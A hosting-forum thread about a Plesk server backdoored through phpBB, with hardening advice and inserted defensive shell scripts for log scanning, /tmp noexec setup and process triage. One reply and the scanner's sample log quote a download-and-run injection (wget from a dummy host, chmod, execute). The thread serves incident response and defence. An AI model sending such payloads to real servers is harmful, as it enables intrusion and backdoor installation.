
Server hacked, but always was updated PLESK 7.5.3

graffix

Guest
Hello,

We're very angry about this, and we found no security problem on our server.

We added a new domain for a client and saw that httpd didn't start.

We logged into the server and saw that something was already running on port 443.

Under ps -axu we then saw these two services:

./bindz
&
./r0nin

We killed them and httpd started normally.

But how did these two services get onto the updated machine?

We use Red Hat FC2, yum is up to date, so we don't see the security problem!

Can anybody help us resolve this problem? We opened a ticket with SWsoft, but no answer so far!

Thanks for the help.
 
This is probably not a Plesk issue, rather a security issue on your server... check that you have mod_security, a firewall etc. .. there are many posts about this in the forums...
 
The processes you mention are mostly installed via phpBB, postNuke etc.
If you have rootkits etc. on the server, the best solution is to do a clean reinstall, as many binaries can be affected, opening backdoors.
After a clean install, remount your /tmp dir noexec and remove gcc and wget from the server.
Have a look at the existing httpd dirs for phpBB and postNuke and update asap.
 
Thanks for the replies, but I think it is still largely a Plesk problem: execution rights on /tmp are very risky?!

Confixx has the same issue. Other panels don't have the same problem.

So my luck was that wget had been renamed on this server, so no other files were loaded onto the server.

I'm running chkrootkit to see if more is infected.
 
Just have a look at how the "tools" are spreading ..

http://www.to.be.infected.pc/test.gif?&cmd=cd /;cd tmp;mkdir%...%20.x;wget%20www.havingworm.pc/worm/r0nin;chmod%20777%20r0nin;./r0nin

Making /tmp noexec would leave the bin in /tmp but not executed. Never compile chkrootkit on an infected system. Build it elsewhere, then check with the statically compiled version. :)
Again, this is not a Plesk issue - that's a PHP problem. ;)
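As an added example (not part of the thread), here is how the "cmd=" download-and-run pattern quoted above can be picked out of an Apache combined-format access log. The four log lines are constructed for the example and reuse the post's dummy hostnames; the heuristic (a cmd= parameter chaining into wget/curl/chmod or a /tmp change-dir) is an assumption drawn from that one payload, not a complete signature set:

```shell
#!/bin/sh
# Added example (not from the thread): flag "cmd=" download-and-run requests
# in Apache combined-format access logs. Sample lines below are constructed.

# Percent-decode with awk only, so it works in plain sh as well as bash.
urldecode() {
    printf '%s\n' "$1" | awk '
    BEGIN { hex = "0123456789abcdef" }
    {
        s = $0; out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "+") {
                out = out " "; s = substr(s, 2)
            } else if (c == "%" && substr(s, 2, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                h = tolower(substr(s, 2, 2))
                n = (index(hex, substr(h, 1, 1)) - 1) * 16 + index(hex, substr(h, 2, 1)) - 1
                out = out sprintf("%c", n); s = substr(s, 4)
            } else {
                out = out c; s = substr(s, 2)
            }
        }
        print out
    }'
}

# Field 7 of a combined-format log line is the request URI.
request_of() {
    urldecode "$(printf '%s\n' "$1" | awk '{ print $7 }')"
}

# Heuristic taken from the payload above: a cmd= parameter that chains (;)
# into a fetch, a chmod or a /tmp change-dir. Matching is done on the DECODED
# URI so %3B and %2F do not slip past. Exit 0 = suspicious, 1 = clean.
is_download_and_run() {
    decoded=$(request_of "$1")
    case "$decoded" in
        *cmd=*\;*wget*|*cmd=*\;*curl*|*cmd=*\;*chmod*|*cmd=*\;*/tmp*) return 0 ;;
    esac
    return 1
}

# Print every suspicious entry, decoded, with its line number and source IP.
scan_log() {
    n=0
    while IFS= read -r line; do
        n=$((n + 1))
        if is_download_and_run "$line"; then
            printf 'line %d from %s: %s\n' "$n" "${line%% *}" "$(request_of "$line")"
        fi
    done < "$1"
}

# Number of suspicious entries in a log file.
count_hits() {
    scan_log "$1" | awk 'END { print NR }'
}

# Constructed sample log: one benign page hit, one literal copy of the payload
# quoted in the thread, one harmless "cmd=list", and one fully percent-encoded
# variant of the same trick dropping the other binary named in the first post.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [12/Jun/2005:03:14:07 +0200] "GET /forum/index.php?page=1 HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Jun/2005:03:14:09 +0200] "GET /test.gif?&cmd=cd%20/;cd%20tmp;mkdir%20.x;wget%20www.havingworm.pc/worm/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.1" 200 4211 "-" "Mozilla/4.0"
10.0.0.7 - - [12/Jun/2005:03:15:00 +0200] "GET /gallery/view.php?cmd=list&id=3 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jun/2005:03:16:21 +0200] "GET /test.gif?cmd=cd%20%2Ftmp%3Bwget%20www.havingworm.pc%2Fworm%2Fbindz%3Bchmod%20%2Bx%20bindz%3B.%2Fbindz HTTP/1.1" 200 4211 "-" "Mozilla/4.0"
EOF

scan_log "$SAMPLE_LOG"   # prints the two injection attempts; file left for inspection
```

Run it against a real vhost log with `scan_log /home/httpd/vhosts/DOMAIN/statistics/logs/access_log` (path assumed); the point of decoding first is that the fourth sample line, which is the same attack with every `;` and `/` percent-encoded, is only caught because the match runs on the decoded URI. Anything this flags should be cross-checked against the timestamps of the files found in /tmp.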
 
It's not technically a Plesk issue, but Plesk does distribute a vulnerable (hackable) version of phpBB in their Application Vault, right? I don't think they've updated the application to a non-vulnerable version. So I think if you use the Application Vault version of phpBB, you will get hacked again.
 
Some real lightweight forensics here: before killing the process, look to see what user it is running as (ps aux). If it is running as apache, it's most likely an exploitable PHP app. If it's running as some other user, probably an exploitable cgi-bin app, and if it's running as root, it was probably an exploitable service.

I've got RPMs for chkrootkit and rkhunter in my archive, and in addition I've been developing a security suite targeted at securing hosting servers called Atomic Secured Linux (ASL). That project includes both a kernel hardened specifically for security, and an intrusion detection/response layer with mod_security and mod_dosevasive. We also currently maintain the largest signature database for mod_security (well over a thousand signatures at this date).
 
Thanks for the answers ...
It's very difficult to find which customer's/client's
PHP program is vulnerable.

We moved the backdoor programs to a secure home dir.

But why do all PHP programs use /tmp instead of /home/httpd/vhosts/phptemp, and run with only user rights instead of as apache?

Whatever, we must search for a good way to secure our server.

Is using Virtuozzo more stable? The kernel there is smaller and not overloaded, but the build is very old, 2.4.xx?

Does someone have a good idea?

Thanks
 
2.4.xx kernels are fine if you're running Virtuozzo ... the latest Virtuozzo kernel for VZ 2.6.1 is 2.4.20-021stab028.12.777, a 2.6.x kernel is due later in the year.

You need to make sure you're running a firewall; try mod_security to tighten up security, and rkhunter and chkrootkit as suggested, and you might find out if you've been rooted.

Your best bet if you're running the Virtuozzo node would be to create another VE and copy the plesk data across from your existing VE to ensure you're running safe binaries. Alternatively you could just create a new VE and copy the binaries from that to your existing server. MAKE BACKUPS FIRST
 
I had this exact same process running some time ago: 'r0nin'.

It was a phpBB exploit and had some garbage in /tmp also.

No more phpBB on my servers!! Last week another phpBB exploit came in .. on the previous version of phpBB.

phpBB is as leaky as a fishing net. (That is how we Dutch people would say that ;)
 
Is there a way to secure /tmp if it isn't mounted, but is just a directory?
 
Even though you secure /tmp, they can still run .pl files etc.. (correct me if I'm wrong)
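The question just above (/tmp is only a directory, not a mount) and the earlier advice to remount /tmp noexec both come down to the same procedure, so here is an added example of it; this is not from the thread or from Plesk. The loop-file path and size, the ext2 choice and the sample mount table are assumptions; the `setup_loop_tmp` function is meant to be run by root on the server and is deliberately not invoked when the script is executed, while the two check functions run anywhere:

```shell
#!/bin/sh
# Added example (not from the thread): give a plain /tmp directory its own
# noexec,nosuid,nodev filesystem, then verify the flags are actually in effect.
# Backing-file path/size, ext2 and the sample mount table are assumptions.

# Step 1 (root only, NOT executed when this file runs): a file-backed ext2
# filesystem mounted over /tmp via the loop device. If /tmp is already its own
# partition, "mount -o remount,noexec,nosuid,nodev /tmp" is all that is needed.
setup_loop_tmp() {
    img=/var/tmpfs.img            # assumed backing file
    size_mb=${1:-512}             # assumed size
    dd if=/dev/zero of="$img" bs=1M count="$size_mb"
    mkfs.ext2 -F "$img"           # -F: it is a file, not a block device
    chmod 600 "$img"
    # 'loop' makes mount set up the loop device for us at boot as well
    printf '%s\n' "$img /tmp ext2 loop,noexec,nosuid,nodev 0 0" >> /etc/fstab
    # keep whatever is in /tmp right now (sockets, session files) across the switch
    mkdir -p /tmp.old && cp -a /tmp/. /tmp.old/
    mount /tmp && cp -a /tmp.old/. /tmp/ && chmod 1777 /tmp && rm -rf /tmp.old
    # /var/tmp is the other favourite drop point (see the ASL log lines in this
    # thread); pointing it at the hardened /tmp covers it with the same flags
    mv /var/tmp /var/tmp.old && ln -s /tmp /var/tmp
}

# Step 2: read the mount table ($1, /proc/mounts format) and print the options
# of the entry serving $2 (the last matching entry wins, as it does for the kernel).
mount_opts_for() {
    awk -v target="$2" '$2 == target { opts = $4 } END { print opts }' "$1"
}

# Exit 0 if $2 is a separate mount carrying noexec, nosuid and nodev; 1 otherwise.
tmp_is_hardened() {
    table=${1:-/proc/mounts}
    dir=${2:-/tmp}
    opts=$(mount_opts_for "$table" "$dir")
    [ -n "$opts" ] || { echo "$dir is not a separate mount"; return 1; }
    for flag in noexec nosuid nodev; do
        case ",$opts," in
            *,"$flag",*) ;;
            *) echo "$dir is missing $flag (options: $opts)"; return 1 ;;
        esac
    done
    echo "$dir ok: $opts"
}

# Step 3: behavioural probe. Drops a tiny script into $1 and tries to run it;
# with noexec in place the execve itself is refused. Exit 0 = blocked.
exec_probe() {
    probe=$(mktemp "$1/probe.XXXXXX") || return 2
    printf '#!/bin/sh\nexit 0\n' > "$probe"
    chmod 755 "$probe"
    if "$probe" 2>/dev/null; then
        rm -f "$probe"; echo "$1 allows execution"; return 1
    fi
    rm -f "$probe"; echo "$1 blocks execution"
}

# Constructed mount table: /tmp done right, /home a mount without the flags,
# /usr not a separate mount at all.
SAMPLE_MOUNTS=$(mktemp)
cat > "$SAMPLE_MOUNTS" <<'EOF'
/dev/hda2 / ext3 rw 0 0
none /proc proc rw 0 0
/dev/loop0 /tmp ext2 rw,nosuid,nodev,noexec 0 0
/dev/hda5 /home ext3 rw 0 0
EOF

tmp_is_hardened "$SAMPLE_MOUNTS" /tmp
tmp_is_hardened "$SAMPLE_MOUNTS" /home || true
exec_probe /tmp || true
```

Two caveats that the replies in this thread already touch on: noexec stops `./r0nin`, but `perl /tmp/x.pl` or `sh /tmp/x.sh` still works because the program being executed is the interpreter, not the file in /tmp (that is the `.pl` point made above), and the dropped file itself stays on disk, so the check functions belong in a cron job next to chkrootkit rather than being a one-off.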
 
/tmp isn't really enough; the bad guys can run their exploits from any directory writable by the webserver. I see them running in the users' httpdocs these days as often as I see them running from /tmp or /var/tmp. Here are a few examples of what ASL has caught:


From 172.150.XX.XXX: denied untrusted exec of /var/tmp/za/zero by /bin/bash[sh:2905] uid/euid:48/48 gid/egid:48/48, parent /bin/bash[sh:32502] uid/euid:48/48 gid/eg8

Attacker trying to run /var/tmp/za that they've uploaded and tried to run as apache (48/48).

Here's another system where they're running it from the user's directory:
From 83.91.XX.XX denied untrusted exec of /home/httpd/vhosts/DOMAIN.COM/httpdocs/albums/DOMAIN/img/.htaccess/.kiki/y2kupdate by /bin/bash[sh:20555] uid/euid:48/48 gid/egid:48/48

This time the attacker shifted the exploit to a writable home directory, as /tmp was mounted noexec. Side note on this one: the app exploited was 100% custom code, so this wasn't your standard canned phpBB attack.

In both cases, however, the attack didn't work (although the applications were still exploitable) since ASL treats apache as an untrusted user and will only let it execute apps owned by root. It's a simple way to in essence make the whole system noexec, but without the collateral damage that would cause otherwise.
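The "look before you kill" advice earlier in the thread (which user owns the process tells you which layer was exploited) and the point just made (the binary's location in a web-writable directory is itself the indicator) can be turned into a small triage script. This is an added example, not from the thread and not ASL; it assumes Linux /proc, uid 48 for apache and the /home/httpd/vhosts/*/httpdocs layout as they appear in the log lines above, and the root-ownership test only mimics the trusted-path rule described, it does not enforce anything:

```shell
#!/bin/sh
# Added example (not from the thread, not ASL): triage a suspicious process
# before killing it. Assumes Linux /proc, apache = uid 48, and the
# /home/httpd/vhosts/<domain>/httpdocs layout quoted in the thread.

# Rule 1 (the "lightweight forensics" post): who runs it -> likely entry point.
entry_point_for_uid() {
    case "$1" in
        0)  echo "root: probably an exploitable service" ;;
        48) echo "apache: probably an exploitable PHP app" ;;
        *)  echo "uid $1: probably an exploitable cgi-bin app" ;;
    esac
}

# Rule 2 (the ASL log lines): is the binary in a place a web app could write to?
# Exit 0 = untrusted location. The last pattern catches a hidden directory
# anywhere in the path (like the .kiki example) without matching "." or "..".
untrusted_location() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        /home/httpd/vhosts/*/httpdocs/*|/home/httpd/vhosts/*/cgi-bin/*) return 0 ;;
        */.[!./]*/*) return 0 ;;
    esac
    return 1
}

# One-line verdict from uid, executable path and the executable's owner uid
# ("?" when the file is no longer on disk).
verdict() {
    uid=$1; exe=$2; owner=$3
    msg=$(entry_point_for_uid "$uid")
    if untrusted_location "$exe"; then
        msg="$msg; runs from a web-writable location ($exe): treat as a dropped backdoor"
    fi
    if [ "$owner" = "?" ]; then
        msg="$msg; binary is gone from disk ('(deleted)' in /proc): copy /proc/PID/exe before killing"
    elif [ "$uid" != 0 ] && [ "$owner" != 0 ]; then
        msg="$msg; binary not owned by root (uid $owner): a trusted-path rule as described would refuse it"
    fi
    echo "$msg"
}

# Pull euid, exe and cwd for a live pid out of /proc and print the verdict.
triage_pid() {
    pid=$1
    [ -r "/proc/$pid/status" ] || { echo "no such process: $pid"; return 1; }
    uid=$(awk '/^Uid:/ { print $3 }' "/proc/$pid/status")   # column 3 = effective uid
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo "?")
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo "?")
    owner=$(ls -ln "$exe" 2>/dev/null | awk '{ print $3 }')
    echo "pid $pid euid $uid exe $exe cwd $cwd"
    verdict "$uid" "$exe" "${owner:-?}"
}

# The "ps -axu" eyeballing from the first post, automated: report every process
# whose executable sits in an untrusted location.
sweep() {
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        if untrusted_location "$exe"; then triage_pid "$pid"; fi
    done
}

sweep
```

Run `sweep` from cron or by hand before reaching for `kill`; once the process is gone, /proc/PID/exe and /proc/PID/cwd are gone with it, and with them the quickest way to find which vhost the attacker came in through.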
 
I'm not a real Linux guru .. but isn't ASL a little bit like SELinux ?
 
Yes, SELinux is a subset of what is available in ASL with 2.6 kernels. In addition to that, ASL includes more kernel-based hardening with grsec/PaX, and userspace intrusion detection/response with mod_security and mod_dosevasive. We currently maintain the largest archive of mod_security signatures (well over 1000 now) through our security portal at gotroot.com.

The idea is to approach this with a security-in-depth model: TPE (trusted path execution), RBAC (grsec and SELinux), IDS (mod_security/mod_dosevasive), PaX (grsec), etc. all support each other. If an attacker can defeat one component, there are other pieces in the system to catch those failures.
 
A+

In short, Atomic is trying to save admins the time and work involved in setting up a much more hardened Linux environment, from which they can run Plesk. In exchange, all he asks for is a couple bucks for the effort.

If I ran Plesk on Linux, I'd seriously consider it - not because I can't do those things myself, but because it saves a lot of time and effort that could be spent elsewhere on the business.

Anyway. I suppose I'm leaning dangerously close to "promotion" here, so I'll stop :p He definitely knows what he's doing, though.
 
Atomic: if I use the mod_security rules at gotroot.com, are there any "problems", since the rule files are big?
 